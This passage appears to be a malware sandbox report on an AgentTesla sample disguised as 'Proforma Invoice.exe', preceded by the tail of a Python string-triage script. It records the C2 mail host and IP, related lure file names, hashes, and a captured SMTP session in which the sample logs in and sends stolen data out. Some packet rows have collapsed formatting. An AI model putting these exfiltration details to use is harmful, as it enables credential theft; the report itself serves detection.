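    """Host part of a (possibly garbled) URL string; stops at '/', ':' or a stray '%'."""
    m = re.match(r"^[a-z]+://([^/%:]+)", url, re.IGNORECASE)
    return m.group(1).lower() if m else None


def triage(strings, yara_regions=YARA_REGIONS, contacted=CONTACTED_HOSTS):
    """Score each string; higher means more likely a payload artifact.
    Returns [(url, score, [reasons])] sorted by descending score. Weights are arbitrary."""
    results = []
    for url, source in strings:
        regions = parse_regions(source)
        reasons = []
        if any(r.key in yara_regions for r in regions):
            reasons.append((2, "found in a Yara-matched region"))
        if host_of(url) in contacted:
            reasons.append((2, "host was contacted during the run"))
        if any(r.protection == PAGE_EXECUTE_READWRITE for r in regions):
            reasons.append((1, "found in an RWX region (unpacked code)"))
        if len({r.process_index for r in regions}) > 1:
            reasons.append((1, "present in more than one process"))
        results.append((url, sum(w for w, _ in reasons), [t for _, t in reasons]))
    results.sort(key=lambda row: row[1], reverse=True)
    return results


if __name__ == "__main__":
    for url, score, reasons in triage(SAMPLE_STRINGS):
        print(f"{score} {url}")
        for reason in reasons:
            print(f"    - {reason}")
```

Run on the full table, the font-vendor rows all score zero, the loopback/ipify/DynDns strings from the injected stage score by region, and the Tor download URL scores highest because it was carved from both the original process's heap and the unpacked image at 0x400000 in process 4.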

                                          Contacted IPs


                                          Public

IP | Domain | Country | ASN | ASN Name | Malicious
185.8.128.141 | webmail.karanex.com | Turkey | 3188 | ALASTYRTR | true

                                          General Information

Joe Sandbox Version: 33.0.0 White Diamond
Analysis ID: 502592
Start date: 14.10.2021
Start time: 05:18:10
Joe Sandbox Product: CloudBasic
Overall analysis duration: 0h 8m 34s
Hypervisor based Inspection enabled: false
Report type: light
Sample file name: Proforma Invoice.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of new started processes analysed: 21
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
• HCA enabled
• EGA enabled
• HDC enabled
• AMSI enabled
Analysis Mode: default
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.troj.spyw.evad.winEXE@5/2@1/1
EGA Information: Failed
HDC Information:
• Successful, ratio: 0% (good quality ratio 0%)
• Quality average: 0%
• Quality standard deviation: 0%
HCA Information:
• Successful, ratio: 100%
• Number of executed functions: 0
• Number of non-executed functions: 0
Cookbook Comments:
• Adjust boot time
• Enable AMSI
• Found application associated with file extension: .exe
Warnings:
• Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, BackgroundTransferHost.exe, WMIADAP.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe, wuapihost.exe
• Excluded IPs from analysis (whitelisted): 95.100.218.151, 95.100.218.79, 20.199.120.151, 20.82.209.183, 20.199.120.182, 20.54.110.249, 2.20.178.10, 2.20.178.56, 40.112.88.60, 52.251.79.25, 20.199.120.85, 2.20.178.33, 2.20.178.24
• Excluded domains from analysis (whitelisted): storeedgefd.dsx.mp.microsoft.com.edgekey.net, consumer-displaycatalogrp-aks2aks-useast.md.mp.microsoft.com.akadns.net, store-images.s-microsoft.com-c.edgekey.net, a767.dspw65.akamai.net, a1449.dscg2.akamai.net, storeedgefd.xbetservices.akadns.net, arc.msn.com, e12564.dspb.akamaiedge.net, wns.notify.trafficmanager.net, consumer-displaycatalogrp-aks2aks-europe.md.mp.microsoft.com.akadns.net, arc.trafficmanager.net, displaycatalog.mp.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, storeedgefd.dsx.mp.microsoft.com, client.wns.windows.com, iris-de-prod-azsc-neu.northeurope.cloudapp.azure.com, displaycatalog-rp-europe.md.mp.microsoft.com.akadns.net, neu-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, wu-shim.trafficmanager.net, ris-prod.trafficmanager.net, asf-ris-prod-neu.northeurope.cloudapp.azure.com, eus2-displaycatalogrp.frontdoor.bigcatalog.commerce.microsoft.com, ctldl.windowsupdate.com, storeedgefd.dsx.mp.microsoft.com.edgekey.net, download.windowsupdate.com.edgesuite.net, ris.api.iris.microsoft.com, store-images.s-microsoft.com, displaycatalog-rp-useast.md.mp.microsoft.com.akadns.net, e16646.dscg.akamaiedge.net, displaycatalog-rp.md.mp.microsoft.com.akadns.net
• Not all processes were analyzed; the report is missing behavior information.
• Report size getting too big, too many NtAllocateVirtualMemory calls found.
• Report size getting too big, too many NtOpenKeyEx calls found.
• Report size getting too big, too many NtProtectVirtualMemory calls found.
• Report size getting too big, too many NtQueryValueKey calls found.

                                          Simulations

                                          Behavior and APIs

Time | Type | Description
05:19:14 | API Interceptor | 748x Sleep call for process: Proforma Invoice.exe modified

                                          Joe Sandbox View / Context

                                          IPs

Match: 185.8.128.141 (every associated sample below was detected as malicious)
• Invoice Lists.exe
• INV 20211012.exe
• October Final Order.exe
• PURCHASE ORDER.exe
• 20211006 PO.exe
• New_Order_PO#96072380_MT_QuoteRFQ.exe
• PO 20213009.exe
• New_Order_PO#96072380_MT_QuoteMTO.exe
• New_Order_PO#960780_MT_Quote-MT-valve.exe
• New_Order_PO#960780_MT_Quote-MT-valve.exe
• New_Order_PO#960780_MT_Quote-MT.exe
• NEW ORDER.exe
• pDKtDOf1YMseKzN.exe
• New_Order_PO#960780_MT_Quote.exe
• New_Order_PO#960780_MT_Quote-MT-RFQ.exe
• 9Jco42YF0nOEZbd.exe
• New_Order_PO#960780_MT_Quote-MT-RFQ.exe
• New_Order_PO#960780_MT_Quote-RFQ.exe
• New_Order_PO#960780_MT_Quote1678.exe
• #RFQ URGENT PO SAMPLE PRODUCT 09082021.exe

                                                                                  Domains

Match: webmail.karanex.com (every associated sample below was detected as malicious and resolved the domain to 185.8.128.141)
• Invoice Lists.exe
• INV 20211012.exe
• October Final Order.exe
• PURCHASE ORDER.exe
• 20211006 PO.exe
• RFQ-Quote-REF-HYODA KM-Request (R ).exe
• New_Order_PO#96072380_MT_QuoteRFQ.exe
• PO 20213009.exe
• Purchase Order NO202340.exe
• NEW ORDER.exe
• pDKtDOf1YMseKzN.exe

                                                                                  ASN

Match: ALASTYRTR (every associated sample below was detected as malicious; the IP each one contacted in this ASN is given in parentheses)
• Invoice Lists.exe (185.8.128.141)
• INV 20211012.exe (185.8.128.141)
• TEKL#U0130F TALEP RFQ_PDF.exe (5.2.87.216)
• October Final Order.exe (185.8.128.141)
• PURCHASE ORDER.exe (185.8.128.141)
• 20211006 PO.exe (185.8.128.141)
• RESM#U0130 TEKL#U0130F VE F#U0130YAT TEKL#U0130F TALEB#U0130_PDF.exe (5.2.87.216)
• TEKL#U0130F TALEP VE #U00dcR#U00dcN #U00d6ZELL#U0130KLER#U0130_PDF.exe (5.2.87.216)
• RESM#U0130 SATIN ALMA S#U0130PAR#U0130#U015e#U0130_PDF.exe (5.2.87.216)
• New_Order_PO#96072380_MT_QuoteRFQ.exe (185.8.128.141)
• PO 20213009.exe (185.8.128.141)
• New_Order_PO#96072380_MT_QuoteMTO.exe (185.8.128.141)
• INVOICE.exe (185.8.128.36)
• Z#U0130RAAT BANKASI #U00d6DEME TAVS#U0130YES#U0130_PDF.exe (5.2.87.216)
• New_Order_PO#960780_MT_Quote-MT-valve.exe (185.8.128.141)
• New_Order_PO#960780_MT_Quote-MT-valve.exe (185.8.128.141)
• New_Order_PO#960780_MT_Quote-MT.exe (185.8.128.141)
• NEW ORDER.exe (185.8.128.141)
• pDKtDOf1YMseKzN.exe (185.8.128.141)
• #U00d6DEME TAVS#U0130YES#U0130_PDF.exe (5.2.87.216)

                                                                                  JA3 Fingerprints

                                                                                  No context

                                                                                  Dropped Files

                                                                                  No context

                                                                                  Created / dropped Files

                                                                                  C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Proforma Invoice.exe.log
                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                  File Type:ASCII text, with CRLF line terminators
                                                                                  Category:dropped
                                                                                  Size (bytes):1216
                                                                                  Entropy (8bit):5.355304211458859
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                                                                  MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                                                                  SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                                                                  SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                                                                  SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                                                                  Malicious:true
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview: 1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21
                                                                                  C:\Users\user\AppData\Roaming\ywwi1ck1.qnq\Chrome\Default\Cookies
                                                                                  Process:C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                  File Type:SQLite 3.x database, last written using SQLite version 3032001
                                                                                  Category:dropped
                                                                                  Size (bytes):20480
                                                                                  Entropy (8bit):0.6970840431455908
                                                                                  Encrypted:false
                                                                                  SSDEEP:24:TLbJLbXaFpEO5bNmISHn06UwcQPx5fBocLgAZOZD/0:T5LLOpEO5J/Kn7U1uBo8NOZ0
                                                                                  MD5:00681D89EDDB6AD25E6F4BD2E66C61C6
                                                                                  SHA1:14B2FBFB460816155190377BBC66AB5D2A15F7AB
                                                                                  SHA-256:8BF06FD5FAE8199D261EB879E771146AE49600DBDED7FDC4EAC83A8C6A7A5D85
                                                                                  SHA-512:159A9DE664091A3986042B2BE594E989FD514163094AC606DC3A6A7661A66A78C0D365B8CA2C94B8BC86D552E59D50407B4680EDADB894320125F0E9F48872D3
                                                                                  Malicious:false
                                                                                  Reputation:high, very likely benign file
                                                                                  Preview: SQLite format 3......@ ..........................................................................C....... ..g... .8....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                  Static File Info

                                                                                  General

                                                                                  File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                                                                  Entropy (8bit):7.945284769091569
                                                                                  TrID:
                                                                                  • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                                                                  • Win32 Executable (generic) a (10002005/4) 49.78%
                                                                                  • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                                                                  • Win16/32 Executable Delphi generic (2074/23) 0.01%
                                                                                  • Generic Win/DOS Executable (2004/3) 0.01%
                                                                                  File name:Proforma Invoice.exe
                                                                                  File size:368128
                                                                                  MD5:dd00dde252a92512815c0d0d3679d1fd
                                                                                  SHA1:44ca2aa75de6ca79ae39408b48cd605d384a9a9b
                                                                                  SHA256:c0057025e69297714ba47f8fc982ec8fd8713f5a270a2d638257bcc395cad39f
                                                                                  SHA512:1bb62ebaa9b13a7e6f97ce09d671c25f46a6f5383d9f0afde4b83d0284cf75408c404fe50d3eb8ed1b4ac7094fc781fec4b370c3bbb4693106c2c2616d2c9fe4
                                                                                  SSDEEP:6144:K+7dXbJMkhB8krJuY9dUUIT7S6kTAzRZzJTON1AZkRGAY+w5SS6K4Wt+/y1Mt0cw:Kw+SBdQq0T7+8DFTODAZ/+dSP3k/y1M8
                                                                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....ga..............0.................. ........@.. ....................................@................................

                                                                                  File Icon

                                                                                  Icon Hash:00828e8e8686b000

                                                                                  Static PE Info

                                                                                  General

                                                                                  Entrypoint:0x45b3e6
                                                                                  Entrypoint Section:.text
                                                                                  Digitally signed:false
                                                                                  Imagebase:0x400000
                                                                                  Subsystem:windows gui
                                                                                  Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                                                                  DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                                                                  Time Stamp:0x6167859B [Thu Oct 14 01:19:23 2021 UTC]
                                                                                  TLS Callbacks:
                                                                                  CLR (.Net) Version:v4.0.30319
                                                                                  OS Version Major:4
                                                                                  OS Version Minor:0
                                                                                  File Version Major:4
                                                                                  File Version Minor:0
                                                                                  Subsystem Version Major:4
                                                                                  Subsystem Version Minor:0
                                                                                  Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                                                                  Entrypoint Preview

                                                                                  Instruction
                                                                                  jmp dword ptr [00402000h]
add byte ptr [eax], al
(this instruction appears 97 times in the preview: after the jmp through the IAT slot at 0x402000 to mscoree!_CorExeMain, the remaining bytes are zero padding, and 00 00 decodes as add byte ptr [eax], al)

Data Directories

Name                                  Virtual Address  Virtual Size  Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT          0x0              0x0
IMAGE_DIRECTORY_ENTRY_IMPORT          0x5b394          0x4f          .text
IMAGE_DIRECTORY_ENTRY_RESOURCE        0x5c000          0x5a4         .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION       0x0              0x0
IMAGE_DIRECTORY_ENTRY_SECURITY        0x0              0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC       0x5e000          0xc           .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG           0x0              0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT       0x0              0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR       0x0              0x0
IMAGE_DIRECTORY_ENTRY_TLS             0x0              0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG     0x0              0x0
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_IAT             0x2000           0x8           .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT    0x0              0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR  0x2008           0x48          .text
IMAGE_DIRECTORY_ENTRY_RESERVED        0x0              0x0

Sections

Name    Virtual Address  Virtual Size  Raw Size  Xored PE  ZLIB Complexity  File Type  Entropy         Characteristics
.text   0x2000           0x593ec       0x59400   False     0.957230939251   data       7.95675018012   IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
.rsrc   0x5c000          0x5a4         0x600     False     0.421875         data       4.07883026947   IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc  0x5e000          0xc           0x200     False     0.044921875      data       0.101910425663  IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name         RVA      Size   Type                                                                          Language  Country
RT_VERSION   0x5c090  0x314  data
RT_MANIFEST  0x5c3b4  0x1ea  XML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

Imports

DLL          Import
mscoree.dll  _CorExeMain

Version Infos

Description       Data
Translation       0x0000 0x04b0
LegalCopyright    Copyright 2015 - 2021
Assembly Version  1.0.0.0
InternalName      c.exe
FileVersion       1.0.0.0
CompanyName
LegalTrademarks
Comments
ProductName       Win UsbInit
ProductVersion    1.0.0.0
FileDescription   Win UsbInit
OriginalFilename  c.exe

Network Behavior

Snort IDS Alerts

Timestamp                  Protocol  SID      Message                              Source Port  Dest Port  Source IP    Dest IP
10/14/21-05:20:53.478836   TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49841        587        192.168.2.3  185.8.128.141
10/14/21-05:20:55.450868   TCP       2030171  ET TROJAN AgentTesla Exfil Via SMTP  49842        587        192.168.2.3  185.8.128.141

Network Port Distribution

TCP Packets

Timestamp                             Source Port  Dest Port  Source IP      Dest IP
Oct 14, 2021 05:20:52.366280079 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:52.423247099 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:52.423511982 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.105591059 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.106681108 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.163875103 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.165122032 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.222656012 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.223586082 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.301810980 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.302635908 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.359736919 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.360028028 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.420150995 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.420588017 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.477523088 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.477816105 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.478836060 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.478951931 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.479655027 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.479703903 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:53.535830021 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.536479950 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.542679071 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:53.585494995 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:54.913331032 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:54.971801043 CEST  587          49841      185.8.128.141  192.168.2.3
Oct 14, 2021 05:20:54.972239017 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:54.972598076 CEST  49841        587        192.168.2.3    185.8.128.141
Oct 14, 2021 05:20:54.974750996 CEST  49842        587        192.168.2.3    185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.029407024 CEST58749841185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.031656981 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.031912088 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.091969967 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.092401028 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.149497986 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.150111914 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.207438946 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.208462954 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.271754026 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.272250891 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.329298973 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.330032110 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.390760899 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.391385078 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.448431969 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.448453903 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.450719118 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.450867891 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451014042 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451143980 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451366901 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451478004 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451586962 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.451704025 CEST49842587192.168.2.3185.8.128.141
                                                                                  Oct 14, 2021 05:20:55.507569075 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.507869959 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.508111000 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.508126020 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.512649059 CEST58749842185.8.128.141192.168.2.3
                                                                                  Oct 14, 2021 05:20:55.554497004 CEST49842587192.168.2.3185.8.128.141

                                                                                  UDP Packets

                                                                                   Timestamp                            | Source Port | Dest Port | Source IP   | Dest IP
                                                                                   Oct 14, 2021 05:20:52.179286957 CEST | 58540       | 53        | 192.168.2.3 | 8.8.8.8
                                                                                   Oct 14, 2021 05:20:52.264353991 CEST | 53          | 58540     | 8.8.8.8     | 192.168.2.3

                                                                                  DNS Queries

                                                                                   Timestamp                            | Source IP   | Dest IP | Trans ID | OP Code            | Name                | Type           | Class
                                                                                   Oct 14, 2021 05:20:52.179286957 CEST | 192.168.2.3 | 8.8.8.8 | 0x65b2   | Standard query (0) | webmail.karanex.com | A (IP address) | IN (0x0001)

                                                                                  DNS Answers

                                                                                   Timestamp                            | Source IP | Dest IP     | Trans ID | Reply Code   | Name                | CName | Address       | Type           | Class
                                                                                   Oct 14, 2021 05:20:52.264353991 CEST | 8.8.8.8   | 192.168.2.3 | 0x65b2   | No error (0) | webmail.karanex.com |       | 185.8.128.141 | A (IP address) | IN (0x0001)

                                                                                  SMTP Packets

                                                                                   Timestamp                            | Source Port | Dest Port | Source IP     | Dest IP       | Commands
                                                                                   Oct 14, 2021 05:20:53.105591059 CEST | 587         | 49841     | 185.8.128.141 | 192.168.2.3   | 220-feronia.alastyr.com ESMTP Exim 4.94.2 #2 Thu, 14 Oct 2021 06:20:51 +0300
                                                                                                                                                                                   220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                   220 and/or bulk e-mail.
                                                                                   Oct 14, 2021 05:20:53.106681108 CEST | 49841       | 587       | 192.168.2.3   | 185.8.128.141 | EHLO 899552
                                                                                   Oct 14, 2021 05:20:53.163875103 CEST | 587         | 49841     | 185.8.128.141 | 192.168.2.3   | 250-feronia.alastyr.com Hello 899552 [102.129.143.33]
                                                                                                                                                                                   250-SIZE 52428800
                                                                                                                                                                                   250-8BITMIME
                                                                                                                                                                                   250-PIPELINING
                                                                                                                                                                                   250-PIPE_CONNECT
                                                                                                                                                                                   250-AUTH PLAIN LOGIN
                                                                                                                                                                                   250-STARTTLS
                                                                                                                                                                                   250 HELP
                                                                                   Oct 14, 2021 05:20:53.165122032 CEST | 49841       | 587       | 192.168.2.3   | 185.8.128.141 | AUTH login a2VuZGFrZW5kYUBrYXJhbmV4LmNvbQ==
                                                                                   Oct 14, 2021 05:20:53.222656012 CEST | 587         | 49841     | 185.8.128.141 | 192.168.2.3   | 334 UGFzc3dvcmQ6
                                                                                   Oct 14, 2021 05:20:53.301810980 CEST | 587         | 49841     | 185.8.128.141 | 192.168.2.3   | 235 Authentication succeeded
                                                                                   Oct 14, 2021 05:20:53.302635908 CEST | 49841       | 587       | 192.168.2.3   | 185.8.128.141 | MAIL FROM:<kendakenda@karanex.com>
                                                                                   Oct 14, 2021 05:20:53.359736919 CEST | 587         | 49841     | 185.8.128.141 | 192.168.2.3   | 250 OK
                                                                                   Oct 14, 2021 05:20:53.360028028 CEST | 49841       | 587       | 192.168.2.3   | 185.8.128.141 | RCPT TO:<kendakenda@karanex.com>
                                                                                   Oct 14, 2021 05:20:53.420150995 CEST | 587         | 49841     | 185.8.128.141 | 192.168.2.3   | 250 Accepted
                                                                                   Oct 14, 2021 05:20:53.420588017 CEST | 49841       | 587       | 192.168.2.3   | 185.8.128.141 | DATA
                                                                                   Oct 14, 2021 05:20:53.477816105 CEST | 587         | 49841     | 185.8.128.141 | 192.168.2.3   | 354 Enter message, ending with "." on a line by itself
                                                                                   Oct 14, 2021 05:20:53.479703903 CEST | 49841       | 587       | 192.168.2.3   | 185.8.128.141 | .
                                                                                   Oct 14, 2021 05:20:53.542679071 CEST | 587         | 49841     | 185.8.128.141 | 192.168.2.3   | 250 OK id=1marIa-008l8N-7s
                                                                                   Oct 14, 2021 05:20:54.913331032 CEST | 49841       | 587       | 192.168.2.3   | 185.8.128.141 | QUIT
                                                                                   Oct 14, 2021 05:20:54.971801043 CEST | 587         | 49841     | 185.8.128.141 | 192.168.2.3   | 221 feronia.alastyr.com closing connection
                                                                                   Oct 14, 2021 05:20:55.091969967 CEST | 587         | 49842     | 185.8.128.141 | 192.168.2.3   | 220-feronia.alastyr.com ESMTP Exim 4.94.2 #2 Thu, 14 Oct 2021 06:20:53 +0300
                                                                                                                                                                                   220-We do not authorize the use of this system to transport unsolicited,
                                                                                                                                                                                   220 and/or bulk e-mail.
                                                                                   Oct 14, 2021 05:20:55.092401028 CEST | 49842       | 587       | 192.168.2.3   | 185.8.128.141 | EHLO 899552
                                                                                   Oct 14, 2021 05:20:55.149497986 CEST | 587         | 49842     | 185.8.128.141 | 192.168.2.3   | 250-feronia.alastyr.com Hello 899552 [102.129.143.33]
                                                                                                                                                                                   250-SIZE 52428800
                                                                                                                                                                                   250-8BITMIME
                                                                                                                                                                                   250-PIPELINING
                                                                                                                                                                                   250-PIPE_CONNECT
                                                                                                                                                                                   250-AUTH PLAIN LOGIN
                                                                                                                                                                                   250-STARTTLS
                                                                                                                                                                                   250 HELP
                                                                                   Oct 14, 2021 05:20:55.150111914 CEST | 49842       | 587       | 192.168.2.3   | 185.8.128.141 | AUTH login a2VuZGFrZW5kYUBrYXJhbmV4LmNvbQ==
                                                                                   Oct 14, 2021 05:20:55.207438946 CEST | 587         | 49842     | 185.8.128.141 | 192.168.2.3   | 334 UGFzc3dvcmQ6
                                                                                   Oct 14, 2021 05:20:55.271754026 CEST | 587         | 49842     | 185.8.128.141 | 192.168.2.3   | 235 Authentication succeeded
                                                                                   Oct 14, 2021 05:20:55.272250891 CEST | 49842       | 587       | 192.168.2.3   | 185.8.128.141 | MAIL FROM:<kendakenda@karanex.com>
                                                                                   Oct 14, 2021 05:20:55.329298973 CEST | 587         | 49842     | 185.8.128.141 | 192.168.2.3   | 250 OK
                                                                                   Oct 14, 2021 05:20:55.330032110 CEST | 49842       | 587       | 192.168.2.3   | 185.8.128.141 | RCPT TO:<kendakenda@karanex.com>
                                                                                   Oct 14, 2021 05:20:55.390760899 CEST | 587         | 49842     | 185.8.128.141 | 192.168.2.3   | 250 Accepted
                                                                                   Oct 14, 2021 05:20:55.391385078 CEST | 49842       | 587       | 192.168.2.3   | 185.8.128.141 | DATA
                                                                                   Oct 14, 2021 05:20:55.448453903 CEST | 587         | 49842     | 185.8.128.141 | 192.168.2.3   | 354 Enter message, ending with "." on a line by itself
                                                                                   Oct 14, 2021 05:20:55.451704025 CEST | 49842       | 587       | 192.168.2.3   | 185.8.128.141 | .
                                                                                   Oct 14, 2021 05:20:55.512649059 CEST | 587         | 49842     | 185.8.128.141 | 192.168.2.3   | 250 OK id=1marIc-008l8c-6v

                                                                                  Code Manipulations

                                                                                  Statistics

                                                                                  Behavior


                                                                                  System Behavior

                                                                                  General

                                                                                   Start time: 05:19:08
                                                                                   Start date: 14/10/2021
                                                                                   Path: C:\Users\user\Desktop\Proforma Invoice.exe
                                                                                   Wow64 process (32bit): true
                                                                                   Commandline: 'C:\Users\user\Desktop\Proforma Invoice.exe'
                                                                                   Imagebase: 0x2a0000
                                                                                   File size: 368128 bytes
                                                                                   MD5 hash: DD00DDE252A92512815C0D0D3679D1FD
                                                                                   Has elevated privileges: true
                                                                                   Has administrator privileges: true
                                                                                   Programmed in: .Net C# or VB.NET
                                                                                   Yara matches:
